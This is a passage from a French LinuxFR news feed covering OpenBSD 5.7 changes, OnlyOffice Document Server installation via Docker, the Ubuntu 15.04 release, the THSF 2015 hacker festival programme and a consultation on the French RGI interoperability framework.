  • Gnome 3.14.2 ;
  • Go 1.4.1 ;
  • Libreoffice 4.3.5 ;
  • LLVM/CLANG 3.5 ;
  • Firefox 35.0.1 et 31.4.0-ESR ;
  • Mono 3.12.0 ;
  • Perl 5.20 ;
  • PHP 5.3.29, 5.4.38, 5.5.22 et 5.6.5 ;
  • Xfce 4.10 ;
  • et bien d'autres… (plus de 9 000 ports)
Réseau
  • la couche des mbufs bénéficie désormais du multi-processing de manière sécurisée ;
  • les interfaces carp nécessitent obligatoirement l’option carpdev ;
  • il est possible de changer la taille de la file d’attente des paquets IPv6.
Sécurité
  • l’espace d’adressage du noyau a été renforcé au moyen des mécanismes W^X (aucun emplacement mémoire n’est à la fois accessible en exécution et en écriture) ;
  • il n’est plus possible de charger des modules noyau ;
  • procfs a été supprimé ;
  • /var/tmp est maintenant un lien symbolique vers /tmp ; ce n’est qu'un premier pas vers la réduction de la surface d’attaque de la partition /var ;
  • SHA512 remplace MD5 pour les séquences initiales de TCP ainsi que dans le générateur de nombres aléatoires ;
  • le passwd ne gère plus que le chiffrement Blowfish ;
  • SSLv2/3 ont été complètement retirés d’OpenBSD au profit de TLS (y compris pour OpenSMTPD), ils sont aussi désactivés par défaut dans LibreSSL ;
  • LibreSSL gère des algorithmes AEAD et le PFS par défaut ;
  • toutes les architectures bénéficient enfin (débuté en 2003 par les libraires) de PIE, le système d’allocation en position aléatoire des programmes en mémoire (cf. Pascal Stumpf, Converting OpenBSD to PIE, AsiaBSDCon 2015 : transparents, papier).
Pilotes

Parmi une trentaine de nouveaux pilotes on remarque notamment :

Serveur web

Nginx a été retiré de base. Si vous souhaitez l’utiliser il faut passer par les packages. Il a été remplacé par httpd inclus dans base lors de la sortie de la version précédente. Le module FastCGI a été notablement amélioré rendant httpd compatible avec davantage d’applications web courantes (cf. Reyk Flöter, OpenBSD's new httpd, AsiaBSDCon 2015 : transparents, papier).

Entré en septembre 2011 et sorti en mai 2015, après moins de quatre ans, Nginx n’aura pas fait long feu, alors qu’Apache avait rendu service pendant seize ans.

Pour rappel, httpd n’offre pas toutes les fonctionnalités de Nginx mais seulement celles utiles au projet — ce qui devrait suffire au commun des mortels évidemment. Pour 10 000 lignes de code, la chose est honnête :

  • fichiers statiques : sert les fichiers et répertoires statiques via l'option auto-indexing ;
  • fastCGI : FastCGI direct (pas de cache) et asynchrone via des sockets UNIX ou locaux ;
  • sécurité : sécurité avant tout, chrooté avec privsep par défaut ;
  • SSL/TLS : connexions sécurisées en TLS 1.2 via LibreSSL ;
  • serveurs virtuels : serveurs virtuels par nom ou IP ;
  • reconfiguration : rafraîchissement de la configuration sans interruption ;
  • journalisation : journalisation pour chaque serveur via des fichiers de log ou syslog ;
  • accès : blocage, ralentissement et redirection de connexions.

L’ajout de Server Name Indication (SNI) et des certificats client est envisagé.

Installation
  • il est possible de booter sur les architectures PowerMac7,2 et PowerMac7,3 avec un noyau multiprocesseur ;
  • les interfaces réseau virtuelles trunk (agrégation de liens physiques) sont disponibles durant les mises à jour ;
  • les fonctionnalités cryptographiques ont été retirées du ramdisk — également compilé sans optimisation — afin de récupérer de l’espace pour d’autres fonctionnalités ;
  • les ensembles etcXX.tgz et xetcXX.tgz ont été fusionnés avec baseXX.tgz et xbaseXX.tgz.
Divers

Mandoc prend en charge les codages UTF-8 et ISO-8859-1. Les programmes man et apropos sont maintenant des façades de mandoc (cf. Ingo Schwarze, New trends in mandoc, BSDcan 2014).

L’implémentation des opérations atomiques a été complétée pour toutes les architectures avec les nouvelles primitives :

  • atomic_cas_uint ;
  • atomic_swap_uint ;
  • atomic_add_int ;
  • atomic_sub_int ;
  • atomic_inc_int ;
  • atomic_dec_int et membar_sync.

Les développeurs travaillent activement à supprimer le verrou global du noyau. Sans cela, il est impossible d’exploiter correctement une machine multi-processeur. Pour le moment, seuls 20 appels système sur 208 sont sans verrou. Par contre, le sous-système audio est déjà sans verrou, ainsi que le pilote réseau myx.

L’usage des fonctions d’allocation de mémoire (propres à OpenBSD : reallocarray() et mallocarray()) a été généralisé pour prévenir les débordements d’entier, en lieu et place de la politique précédente concernant calloc(). Elles offrent un compromis entre la flexibilité de realloc() et la lenteur de calloc() — cette dernière initialise systématiquement la totalité de la mémoire allouée, sans considération d'utilité.

Ci-gisent hp300, mvme68k et mvme88k

La prise en charge de plusieurs architectures a été retirée d'OpenBSD 5.5 : hp300, mvme68k, mvme88k. Le fait n’avait pas été signalé. Les disques durs des machines du responsable de ces ports ont rendu leur dernier soupir. Il a décidé de ne pas réanimer ces infortunés Lazare.

Noone sane will mourn these ports anyway. So long, and thanks for the fish. — Miod Vallat

Aucune personne qui soit saine (d’esprit ?) ne pleurera ces ports de toute façon. Salut, et encore merci pour le poisson — Miod Vallat

NdM : de toute façon Miod Vallat maintient un grand nombre de ports sur toutes sortes de machines.

Passage de GCC à llvm / clang ?

FreeBSD intègre clang dans base depuis la version 9 (janvier 2012), permettant la compilation quasi complète (World et le noyau GENERIC) pour certaines architectures (i386, AMD64, ARM, PowerPC, PowerPC64). Clang n’est pas encore le compilateur par défaut, excepté pour l'architecture x86 depuis novembre 2012.

NetBSD, quant à lui, propose clang comme alternative depuis mars 2014 pour les architectures i386, AMD64 et ARM.

Et OpenBSD dans tout ça ? La question revient régulièrement sur les listes de discussion avec le même constat. Clang manque encore de prise en charge pour les architectures autres que X86, ARM et PowerPC, ce qui freine son adoption en l’état. Toutefois ce n’est pas le seul obstacle.

En juillet 2013, Miod Vallat, le mainteneur des patchs d’OpenBSD pour GCC, a fait part de l’état d’esprit des développeurs sur la question.

Une poignée d’entre eux se familiarise avec les entrailles de llvm / clang espérant dans quelques mois / années pouvoir compiler les architectures principales. La route sera longue.

Toutefois, une question de fond a été soulevée. OpenBSD recherche d’abord et avant tout un compilateur proposant les standards de C / C++ au complet, un support de longue durée (LTS) et une optimisation du code qui n’introduise pas de bogues — pas trop agressive.

Tout se résume à une question de confiance envers le compilateur qui devrait être quasi exempt de bogues et produire des programmes exactement conformes à leur code source. OpenBSD travaille d’arrache-pied pour que sa version de GCC s’approche le plus possible de cet idéal. Une bascule vers clang remettrait en cause tous ces efforts.

Il faut bien constater qu’à ce jour, aucun compilateur libre ne répond à tous ces critères pourtant légitimes. Alors quid d’un support LTS de GCC et llvm / clang, comme pour le noyau Linux ou Firefox ?

Changement de boutique officielle

Depuis octobre 2014, OpenBSD Europe Store, tenue par Zednax, est devenue la boutique privilégiée d’OpenBSD.

La Computer Shop of Calgary d’Austin Hook est toujours en activité, mais devrait fermer à moyen terme — on peut le penser — car il « a acheté une ferme avec des vaches et des chèvres » (sic, pour sa retraite ?). Austin continuera au second plan, en fidèle gardien des traditions, prodiguant ses conseils et son aide.

Après quelques adaptations nécessaires au démarrage pour le paiement en tout point du globe, Theo de Raadt est très content des services rendus par OpenBSD Europe Store qu’il a qualifié de « transparente, responsable, propre ». En bref, de très bonnes relations se sont établies et ce n’est pas sans raison. Longue vie à OpenBSD Europe Store !

Conclusion

Fidèle à elle-même, la communauté OpenBSD continue son chemin avec des moyens modestes mais capables d'innover et de relever les enjeux actuels comme le fork d’OpenSSL.

La liquidation du verrou global du noyau en est un exemple. Il sera intéressant de comparer combien de temps il faudra aux développeurs d’OpenBSD là où ceux du noyau Linux ont mis 31 mois.

Télécharger ce contenu au format Epub

Lire les commentaires

Qjelt Toulouse, le 5 mai 2015

Vendredi 1 Mai

Le groupe d'utilisateurs et utilisatrices de Logiciels Libres de Toulouse Toulibre en collaboration avec Tetaneutral.net fournisseur d'accès internet et hébergeur libre proposent aux sympathisants et sympathisantes de se retrouver l'un des mardis ou jeudis de chaque mois pour échanger autour des logiciels Libres, des réseaux libres, discuter de nos projets respectifs et lancer des initiatives locales autour du Libre. Ce repas est ouvert à toutes et à tous, amatrices et amateurs de l'esprit du Libre, débutantes et débutants ou technicien(ne)s chevronné(e)s.

Ce Qjelt aura lieu le mardi 5 mai 2015 à 20h30, au restaurant "la Paniolade" situé au 146 Boulevard de Suisse à Toulouse. C'est à proximité des ponts jumeaux et accessible par bus même tard le soir (ligne 16 en marchant un peu). Il n'y a pas de formule prévue, c'est à la carte : pizzas, viandes, poissons, salades…

Pour des raisons de logistique, une inscription préalable avant la veille au soir est demandée.

Inscription demandée avant le mercredi soir à l'adresse http://www.toulibre.org/qjelt.

Télécharger ce contenu au format Epub

Lire les commentaires

Protocole de migration vers LibreOffice - disponible en français

Jeudi 30 Avril

Le protocole de migration vers LibreOffice, édité par The Document Foundation, et traduit en Français par Liberasys, est disponible.

Un des clients de la société a demandé de réaliser une étude préliminaire de migration à LibreOffice. En cherchant sur Internet, on peut trouver le document de The Document Foundation : LibreOffice migration protocol. Il détaille la stratégie et le processus qui permettent de migrer vers LibreOffice en maximisant les chances de succès. J'ai beaucoup aimé, je l'ai traduit et je le met à disposition (PDF Hybride en licence CC-BY-SA, à part la marque et le logo Liberasys).

NdM : le document comporte 10 pages et présente d'abord LibreOffice, puis la migration (protocole, expérience des migrations précédentes, communication, personnes relais, formation et support, déploiement).

Depuis 2014 j'utilise uniquement LibreOffice pour mes documents professionnels. En effet les dernières versions de LibreOffice sont stables, fonctionnelles et agréables à utiliser (les versions précédentes n'étaient pas prêtes pour une utilisation professionnelle selon moi, et oui, je suis exigeant :-). J'ai mis un peu de temps à m'adapter au logiciel, mais ça vaut vraiment le coup. De plus, les tests de conversions de documents depuis la suite MS Office on montré un excellent résultat (conversions de macros et de fonctions du tableur, mise en page conservée pour les documents textes et les présentations). Bref, si vous hésitiez, si vous avez testé il y a quelques années et avez été déçu(e), c'est le moment de s'y mettre ! Merci The Document Foundation et merci LibreOffice, vous faites avancer les choses dans le bon sens.

<commercial>
J'ai créé mon entreprise en début d'année à Lorient. Liberasys propose des systèmes d'informations (systèmes, réseaux, sécurité) basés au maximum sur des logiciels libres (ex : Linux Debian, ownCloud, Horde, Zabbix, Proxmox VE et MG, matériel MikroTik et Synology, …). De la réalisation à la maintenance, nous mettons en œuvre les outils informatiques qui collent aux besoins de chaque entreprise, tout en garantissant la liberté de nos clients.
</commercial>

Télécharger ce contenu au format Epub

Lire les commentaires

Publication des éditeurs de documents en ligne de OnlyOffice

Jeudi 30 Avril

OnlyOffice a annoncé, ce 20 avril 2015, la publication de la version bêta de ses éditeurs en ligne : OnlyOffice Document Server. Ces trois logiciels : traitement de texte, feuilles de calcul et présentation, viennent compléter les applications de gestion existantes : gestion de documents, de projets, de clients, de communauté, de courriels, de contacts, etc. déjà présentés sur LinuxFR.org.

OnlyOffice Document Server est distribué sous les termes de la licence AGPL v.3.

Qu'est-ce que OnlyOffice Document Server ?

OnlyOffice Document Server ce sont des éditeurs de textes, de classeurs et de présentations qui se chargent dans votre navigateur web pour une édition collaborative en temps réel, avec commentaires et tchat.

OnlyOffice Document Editor

OnlyOffice Spreadsheet Editor

OnlyOffice Presentation Editor

Technologie

L'interface utilisateur des éditeurs de documents de OnlyOffice est réalisée à base de Canvas (élément de HTML5). Cette technologie permet d'assurer l'identicité du fichier d'entrée avec celui de sortie depuis tout navigateur sous tout système d'exploitation.

Formats pris en charge

Les formats pris en charge par les éditeurs de OnlyOffice sont les suivants :

  • lecture / édition : .doc, .docx, .odt, .rtf, .txt, .xls, .xlsx, .csv, .ods, .ppt, .pptx, .odp ;
  • téléchargement : .doc, .docx, .odt, .rtf, .txt, .pdf, .html, .xlsx, .csv, .ods, pptx.
Intégration avec d'autres produits OnlyOffice

OnlyOffice permet d'installer et d'utiliser les éditeurs de documents en ligne séparément ou en les connectant au système collaboratif (OnlyOffice Community Server) et au serveur de messagerie (OnlyOffice Mail Server).

L'intégration avec la dernière version de OnlyOffice Community Server, sortie ce 20 avril 2015, permet de modifier les fichiers chargés du disque dur de l'ordinateur aussi bien que les fichiers stockés en ligne sur Box, Dropbox, GoogleDrive, SharePoint, OneDrive, OwnCloud etc., tous depuis un seul endroit.

Installation des éditeurs en ligne

Pour installer OnlyOffice Document Server, trois méthodes sont disponibles :

  1. installer à l'aide de Docker ;
  2. utiliser One-Click Installation.
  3. compiler le code source disponible sur GitHub ;
1. Installation à l'aide de Docker

Pour la déployer, vous avez besoin d'avoir Docker 1.4.1 ou supérieur installé sur votre ordinateur.

Installer OnlyOffice Document Server séparément

Démarrez Docker et exécutez la commande suivante :

sudo docker run -i -t -d -p 80:80 onlyoffice/documentserver

Cette commande télécharge le fichier docker à partir de Docker Hub (seulement la première fois) et lance le conteneur pour exécuter OnlyOffice Document Server et toutes les dépendances nécessaires pour son travail.

Installer OnlyOffice Document Server avec OnlyOffice Community Server et Mail Server

Etape 1 : Installer OnlyOffice Document Server.

sudo docker run -i -t -d --name onlyoffice-document-server onlyoffice/documentserver

Etape 2 : Installer OnlyOffice Mail Server.

Pour un fonctionnement correct du serveur de messagerie il est nécessaire de déterminer son nom d'hôte 'yourdomain.com'.

sudo docker run --privileged -i -t -d --name onlyoffice-mail-server -p 25:25 -p 143:143 -p 587:587 \-h yourdomain.com onlyoffice/mailserver

Etape 3 : Installer OnlyOffice Community Server

sudo docker run -i -t -d -p 80:80 -p 443:443 \--link onlyoffice-mail-server:mail_server \--link onlyoffice-document-server:document_server \onlyoffice/communityserver

Par ailleurs, vous pouvez utiliser docker-compose pour installer tous les composants du bureau en ligne en exécutant une seule commande:

wget https://raw.githubusercontent.com/ONLYOFFICE/Docker-CommunityServer/master/docker-compose.yml docker-compose up -d

2. Utilisation de One-Click Installation

Cette installation est destinée à ceux qui désirent installer toute la solution sur une machine vide automatiquement. Pour en profiter :

Etape 1 : Passer à la page de déploiement.

Etape 2 : Saisir les données suivantes : adresse IP, nom d'utilisateur, clé SSH ou mot de passe.

Etape 3 : Cliquer sur le bouton "Install".

Toute la solution sera installée automatiquement sur votre serveur Linux.

Remarque : il est recommandé de changer le mot de passe une fois l'installation complétée.

Une fois installé il suffit de saisir localhost (http://127.0.0.1) dans votre barre d'adresse pour ouvrir le bureau en ligne.

Télécharger ce contenu au format Epub

Lire les commentaires

Sortie d’Ubuntu 15.04

Jeudi 30 Avril

Sortie le 23 avril 2015, Ubuntu 15.04 est la vingt-deuxième version d’Ubuntu. Il s'agit d'une version classique, qui sera maintenue pendant 9 mois. Son nom de code est Vivid Vervet, soit le « vervet vif » en bon français.

Pour rappel, Ubuntu est une distribution GNU/Linux basée sur Debian. Elle a hérité de sa distribution mère l'objectif d'universalité : elle vise à être utile sur les ordinateurs de bureau, les ordinateurs portables, mais aussi les serveurs, le cloud, les téléphones, les tablettes et même les objets connectés en général. Elle se veut simple d’accès pour les utilisateurs n’ayant pas de connaissances poussées en informatique, mais aussi pour les développeurs.

En plus de la distribution mère, Ubuntu, il existe plusieurs variantes officielles, fournies avec des choix logiciels différents, afin de couvrir un besoin (Ubuntu Server, Edubuntu…) ou de fournir un environnement de bureau particulier (Kubuntu, Xubuntu…). Cette dépêche présente les nouveautés pour les principales d’entre elles.

Sommaire

Généralités - En vrac

Comme d'habitude, la plupart des paquets ont été mis à jour.
On notera principalement :

  • Noyau Linux 3.19 ;
  • Mesa 10.5 ;
  • La majeure partie des composants de GNOME passent en 3.14 ;
  • Qt 5.4 ;
  • LibreOffice 4.4.
Gestionnaire de bureau Unity 7

Le bureau par défaut d'Ubuntu, Unity 7, continue d'être maintenu, en attendant que Unity 8 soit prêt à le remplacer sur le poste de travail.

Quelques bugs supplémentaires ont été corrigés et quelques réglages au niveau des animations ont permis d'améliorer quelque peu la fluidité de l'ensemble.
On notera que les menus intégrés localement (apparus en tant qu'option dans Ubuntu 14.04) sont maintenant utilisables avec les fenêtres qui ne sont pas au premier plan.

Du côté de Compiz (dont Unity 7 n'est qu'un plugin), on notera un meilleur support de GNOME2/Mate. Cela tombe à pic, puisque qu'une nouvelle variante officielle, Ubuntu Mate, sort justement pour la première fois avec cette version 15.04.

Cette nouvelle version de Compiz devrait également mettre fin aux problèmes de fluidité avec le pilote propriétaire Nvidia. Pour la petite histoire, et pour appâter les trolls dans les commentaires, un patch pour ce problème avait été fourni par Nvidia il y a plus d'un an mais celui-ci n'avait pas pu être inclus car l'auteur n'avait pas signé de CLA. C'est maintenant chose faite.

Unity 8

Le successeur de Unity 7 a passé l'épreuve du feu : il est embarqué au sein du premier Ubuntu Phone en vente libre, le Bq Aquaris 4.5.

Les gros travaux concernant Unity 8 et Mir sur les téléphones et tablettes sont par conséquent terminés.

Pendant ces derniers mois, les développeurs ont donc pu s'atteler plus sérieusement au développement d'un véritable mode « ordinateur de bureau » pour Unity 8.

L'objectif est d'obtenir une interface dite « convergente », c'est à dire une interface capable de s'adapter dynamiquement à l'environnement dans lequel elle fonctionne (présence ou non d'un clavier ou d'une souris, taille de l'écran…).

Dans cet optique, on notera tout particulièrement l'implémentation du mode multi-fenêtres et de grandes améliorations en ce qui concerne Xmir.

Mieux qu'un long discours, cette impressionnante vidéo montre assez bien le statut des développements.
On peut y voir une tablette sous Ubuntu (Mir/Unity 8) faire fonctionner des applications X11 classiques telle que LibreOffice. Plus intéressant, le simple fait d'associer une souris Bluetooth fait basculer l'interface dans un mode fenêtré.
La même démonstration est ensuite reproduite sur un Nexus 4, c'est à dire un téléphone.

Kubuntu - KDE SC

La variante officielle d'Ubuntu basée sur KDE, Kubuntu, introduit un changement majeur : Plasma 5 est maintenant le bureau par défaut.

Système Passage à systemd

Suite à un travail de fond en collaboration avec Debian (qui qui vient de faire le grand saut à l'occasion de sa nouvelle version), systemd a finalement remplacé Upstart en tant que PID 1.

Upstart reste utilisé sur les téléphones pour le moment, pour cause de noyaux trop anciens pour systemd.
De plus, Upstart n'a pas complètement disparu des autres formats puisqu'il est toujours utilisé pour gérer les sessions utilisateurs.

Autour de LXC LXC

LXC est maintenant en version 1.1. Cette nouvelle mouture apporte principalement un support complet de systemd, que ce soit au niveau de l’hôte ou du conteneur.

Cette nouvelle version introduit également un nouveau composant intéressant : LXCFS. Il s'agit d'un système de fichier en espace utilisateur (Fuse) qui permet d'exposer une version filtrée de /proc dans les conteneurs. Cela permet d'améliorer l'isolation et de faire fonctionner de façon fiable des outils de base comme top ou free. LXCFS est par exemple nécessaire pour faire fonctionner systemd au sein d'un conteneur.

LXD

Ubuntu 15.04 intègre pour la première fois LXD, un nouveau projet ayant pour but de fournir un véritable hyperviseur pour les conteneurs LXC.

Il apporte des choses sympathiques comme les migrations live et la prise d'instantanés. LXD se dit également « sécurisé par défaut », principalement parce qu'il automatise tout le nécessaire pour ne pas avoir à lancer de conteneur en root.

Le tout est enrobé d'une API REST, ce qui permet à l'ensemble d'être intégré dans d'autres projets comme OpenStack Nova et ainsi de gérer des conteneurs massivement, avec les mêmes outils « haut niveau » que ce qui existe actuellement pour les machines virtuelles.

LXD est un projet jeune (6 mois) développé en Go à l'initiative de Canonical. La version 0.7 intégrée dans Ubuntu 15.04 n'est pas encore jugée prête pour la production, mais les utilisateurs sont invités à expérimenter.

Au delà du projet en lui-même, qui semble prometteur, le mode de développement de LXD est très singulier pour un projet initié par Canonical. LXD est en effet développé sur GitHub et est sous licence Apache. De plus, les contributions extérieures ne nécessitent pas la signature d'un accord de contribution (CLA).

Tous les projets de Canonical étaient jusqu'à présent hébergés dans des dépôts bzr sur Launchpad et étaient sous licence (L)GPLv3 assorti du fameux CLA.

Sur le blog de Dustin Kirkland, on apprend — même si on pouvait s'en douter — que des débats internes font rage sur ces sujets. Les développeurs ont dû se battre pour que le développement de LXD soit aussi tourné vers l'extérieur, au potentiel détriment de l'entreprise.

Qui sait, cette expérience en appellera peut-être d'autres.

Snappy

Ubuntu 15.04 propose Snappy pour la première fois en version stable. Cette nouvelle technologie est un excellent exemple de la stratégie de convergence d'Ubuntu.

À l'origine, il n'y avait qu'un « simple » problème à résoudre : les téléphones et tablettes ont besoin d'une système de mise à jour plus adapté qu'un classique apt-get (ou autre système de gestion de paquet traditionnel, type RPM, pacman et autres). La nouvelle architecture devait permettre :

  • des opérations transactionnelles : une interruption impromptue lors d'une opération (coupure de courant…) ne doit pas laisser le système dans un état incohérent ;
  • une utilisation transparente pour l'utilisateur (vous avez déjà vu le regard de désespoir d'un de vos parents quand une mise à jour demande s'il faut conserver l'ancienne version d'un fichier de configuration ? Moi oui) ;
  • une optimisation des besoins en bande passante : seul le différentiel d'une mise à jour doit être téléchargé ;
  • une séparation complète du système « de base » des applications, afin de pouvoir généraliser le sandboxing. Cela permet aussi d'éviter le besoin d'audit manuel de chaque nouveau paquet proposé pour inclusion dans le magasin d'applications.

Tout ceci fonctionne aujourd'hui en production sur les premiers « Ubuntu phone ».

Seulement, on voit bien que ce système pourrait tout à fait avoir sa place dans l'embarqué en général ou dans le cloud. Un vendeur de drones, d'objets connectés ou simplement l'administrateur d'un gros parc de machines pourrait être très intéressé par le concept d'une Ubuntu minimale que l'on puisse mettre à jour de façon simple et transactionnelle. Et l'idéal serait de pouvoir installer/mettre à jour/supprimer des services d'une façon tout aussi simple et sécurisée. Un peu à la manière de ce que peut faire un Docker, mais étendu au système entier.

Snappy est exactement cela : la généralisation du besoin originel des téléphones/tablettes à l'ensemble de l'embarqué, du cloud et peut-être même plus à l'avenir.

Des ISO d'Ubuntu Core en version « Snappy » sont disponibles. Un outil en ligne de commande, snappy, permet de simplement rajouter des applications disposant de paquets Snappy. Par défaut, chaque application est isolée des autres et ne peut pas modifier le système de base.

Il est également possible de rajouter des framework, comme Docker. Ceux-ci sont aussi des paquets Snappy, mais ils sont moins confinés. Ils permettent de modifier le système et doivent donc, contrairement aux applications classiques, subir un audit manuel avant de pouvoir intégrer le dépôt officiel de Snappy.

Ubuntu 15.10

Mark Shuttleworth n'a pas encore annoncé le nom de code de la prochaine version d'Ubuntu. Nous savons juste que son acronyme sera « WW ».

Il est encore trop tôt pour connaître les principaux objectifs de cette prochaine version. Sans trop ce mouiller, on peut cependant supposer une accélération du développement de la version pour ordinateurs de bureau de Unity 8 et Mir. Il serait peut-être optimiste de penser à un remplacement de Unity 7 par défaut, mais le bureau dans sa version next devrait commencer à être utilisable au quotidien par les utilisateurs avancés.

Télécharger ce contenu au format Epub

Lire les commentaires

Toulouse Hacker Space Factory 2015

Jeudi 30 Avril

Après les rumeurs floues, après les prévisions incertaines, voici enfin le programme presque complet du THSF 2015. Il se déroulera du 14 au 17 mai, dans le hangartistique (nimage) du collectif d'artistes autogéré Mixart-Myrys. Le thème de cette édition est « Less is More », que l'on peut approximativement traduire par « ça va quand même bien se passer », et nos amis bretons seront là pour nous aider.

Sommaire Thématique

La mise en commun et la libre circulation des connaissances est une question récurrente qui est relancée à chaque apparition d’une nouvelle technologie, et ce, depuis l’invention de l’imprimerie et de la rule #34. C’est aujourd'hui une évidence interprétée de façons diverses voire opposées et cette notion du partage est particulièrement défendue dans les hackerspaces.

Pour cette nouvelle édition du Toulouse Hacker Space Factory, nous allons prolonger les thématiques liées aux nouvelles et/ou anciennes technologies et aux arts numériques, en tentant une approche par le biais de la croissance dont on nous parle si trop souvent. Ou plutôt de la décroissance, la mécroissance (Ars Industrialis), l’altercroissance et les croissants au beurre…

Less Is More, la simplicité plutôt que la complexité. Ou comment faire mieux avec moins ? Comme chaque année, la priorité est donnée à la diversité des projets présentés et à la diversification des publics, via des propositions innovantes dans le rapport entre les artistes et leurs publics.

Minimalisme, alternatives, initiatives innovantes, nouveaux modèles de consommations, détournements, recyclages de technologies « anciennes »… nous naviguerons dans ces sphères expérimentales, dans un esprit d’échanges et de découvertes, festif, convivial et houblonné (nimage).

Installations
  • Démorétro : Vieilles machines, aka ordinosaures, cpc6128, mo5, Amiga, Blade100, SGI, pdp11…
  • émeute codelab, « branche-toi avec nous » ;
  • machins divers, faits par on ne sait qui ;
  • les petites briques Internet de Tetaneutral ;
  • body bouddhisme, lévitation assistée par ordinateur ;
  • Photomaton guidé par RaspPi (PauLLa)&nbps;;
  • Poussy Draama : « Le Cabinet Mobile du Docteure Duchesne » ;
  • Pierre Grange-Praderas : Le rucher connecté ;
  • cabinet de curiosités du Labomedia ;
  • Stéphane Bissieres, Human likes ;
  • Magali Marc, feedback vidéo&nbps;;
  • Previmeteo, stations météo professionnelles sous Arduino ;
  • démoscène Hackbar - ultimate sound dans le vrai monde - SID required.
Programme Jeudi 14 Vendredi 15
  • Conférences :
    • Philippe Langlois (LTE et VoLTE Pwns : insécurité à long terme) ;
    • Spider Alex (retour sur le Trans Hack Festival) ;
    • Sylvain Courrèges (services de renseignement et lutte anti-subversive) ;
    • Reporters sans frontières & fo0 & Grégoire Pouget (opération Colateral Freedom, hacktivisme au Moyen-Orient, lois de renseignement, et de programmation militaire) ;
    • Médiapart & Jérôme Hourdeaux & fo0 (table ronde sujets d’actualité) ;
  • Ateliers : Accretion textile de MadPhoenix / Initiation Arduino / Démoscène / ArboreSign ;
  • Concerts :
  • Performances :
Samedi 16
  • Conférences :
    • YunoHost (en 2015, est-ce que Madame Michu peut s’auto-héberger ?)
    • Renaud Lifchitz (l’ordinateur quantique en pratique et ses impacts sur la cryptographie, sous réserve installation de DebianSlackware sur un ordinateur quantique ;-)) ;
    • Marc-Olivier Killijian (géolocalisation & geoprivacy) ;
    • Lord Epsylon (les réalités physique et politiques derrière Internet) ;
    • Jérémie Zimmermann (droits et libertés sur Internet) ;
  • Ateliers : Démoscène OpenGL / Autohébergement / Initiation Arduino / Lockpicking / LSF / Kits Tetalab / Sign3D / Drawall.cc ;
  • Concerts :
  • Performances :
    • Lionel D. (suicide à l'homéopathie) ;
    • Margot Lançon & Miadana Randriamorasata (avatar) ;
    • Guillaume « same player shoot again ».
Dimanche 17
  • Conférences :
    • Damien Cauquil (reverse matériel de clavier sans-fil) ;
    • Julien Bethencourt (la gouvernance collaborative - Trois expériences en entreprise) ;
    • Lora Fabian - Mathieu <geb> Goessens (Telecom Bretagne) ;
  • Ateliers : Grafcet & Arduino / Lockpicking / Kits Tetalab / Initiation Arduino / Démoscène ;
  • Concerts : Scène ouverte sur le quai ;
  • Performances : Apéro de cloture, forensic.
Infos pratiques

Voici maintenant quelques petits RTFM afin de mieux vous aider à profiter de ces quatre jours de hacking dans la joie et la bonne humeur.

Vous pouvez avoir un programme plus précis (et éventuellement actualisé (avec les bons horaires (enfin, j'espère)(et les bons liens(si c'est possible))(nimage))) sur le site de Myrys ou du Tetalab :

Mixart-Myrys est situé à côté des Ponts-Jumeaux à Toulouse, au 12 rue Ferdinand Lassalle.

  • Métro ligne B arrêt "Canal du Midi" ;
  • bus ligne 16 arrêt "Suisse" ;
  • bus ligne 15 arrêt "Tricou" ;
  • pour les marins bretons : 43°37'06 N - 1°25'14 E.

Il y aura des possibilités de petite restauration gourmande sur place. Certaines parties de l'évènement seront retransmises en direct sur Radio Myrys. Aucun artiste ne sera maltraité pendant ces quatre jours. Nous ignorons vraiment les conditions climatiques attendues. Certains ateliers nécessiteront une inscription préalable. Et comme tous les ans, quelques surprises (nimage) sont à prévoir…

Télécharger ce contenu au format Epub

Lire les commentaires

Contribuez au Référentiel Général d'Interopérabilité v2.0 français

Mercredi 29 Avril

L'État français modernise son Référentiel Général d'Interopérabilité (RGI). Comme il n'a pas la science infuse, il demande aux spécialistes du terrain de donner leur avis sur le brouillon de ce qui deviendra la version 2.0 : appel public à commentaires RGI.

Attention ! La période de consultation se finit le 15 mai.

Si vous êtes expert(e) dans un domaine ou bien simple utilisateur et que vous souhaitez promouvoir l'interopérabilité (dans la mesure du possible avec un format ouvert et documenté) et ne pas vous retrouver sur Linux/*BSD à devoir lire des formats propriétaires et fermés venant de l'administration mais inutilisables, alors votre avis est le bienvenu.

Notez que l'AFUL et l'APRIL ont ouvert un framapad pour coordonner tout cela.

À noter aussi une consultation de l'Autorité de la Concurrence : voir en fin de seconde partie de la dépêche.

Observations

Voici ce que j'ai relevé (je rappelle que je suis un simple utilisateur):

  • Le document a été réalisé sous LibreOffice 4.1. L'administration utilise bien la version proposée par MIMO
  • Disparition de OOxml (page 67, il est noté comme supprimé) au profit de l'ODF 1.2. La France semble suivre le choix des sujets de sa gracieuse majesté :
  • IPv4 passe en observation et IPv6 est toujours recommandé, une manière subtile de pousser les administrations à passer sur IPv6 ?? (Dans le RGI IPv4 était obligatoire et IPv6 recommandé).
  • WebM est en observation mais aucun codec vidéo (VP8 ou VP9) qu'il peut contenir n'est présent dans le document à la différence du H264, MPEG-2 (statut retiré) et MPEG-4. Vorbis et Flac sont présents à côté du mp3. Le conteneur matroska dont est tiré WebM est aussi de la partie. Opus est absent alors que c'est le premier format audio validé par l'IETF.
  • PDF et PDF/A sont toujours recommandés. Je pense qu'il serait bon de préciser la version du PDF. LibreOffice ne produit que du 1.4 et j'ai l'impression que les lecteurs sous Linux s'arrêtent au 1.6. Pour le formuler autrement, on a souvent du PDF mais pour lire le document de manière complète et totale il faut le logiciel Acrobat Reader d'Adobe, or Linux n'a droit qu'à une veille version obsolète. Donc un linuxien ne peut pas remplir les formulaires PDF. D'ailleurs il est question de PDF Advanced Electronic Signature, cela existe-t-il sous Linux ??
  • TXT est en observation mais quid de l'encodage (UTF-8, unicode, ASCII, …), des retours de chariot et autres joyeusetés ??
Les effets d'UN standard au lieu de DEUX

Je trolle un peu, mais depuis que le gouvernement britannique a décidé de ne prendre qu'un seul format de bureautique (puisque MS Office 2013 sous Windows, LibreOffice et Apache OpenOffice connaissent tous l'ODF 1.2), nous remarquons:

Critique de la forme

S'il est bon que l'État fasse un tour de table, il est dommageable que les commentaires de chacun ne puissent pas être connus. Les anglais avaient laissé les commentaires de chacun consultables au public et cela avait permis à certains de critiquer les points erronés soulevés par d'autres.

Consultation de l'Autorité de la Concurrence

A toutes fins utiles, les domaines étant assez proches, sachez que l'Autorité de la Concurrence a lancé une consultation sur le fonctionnement de la concurrence dans le secteur de la normalisation et de la certification.

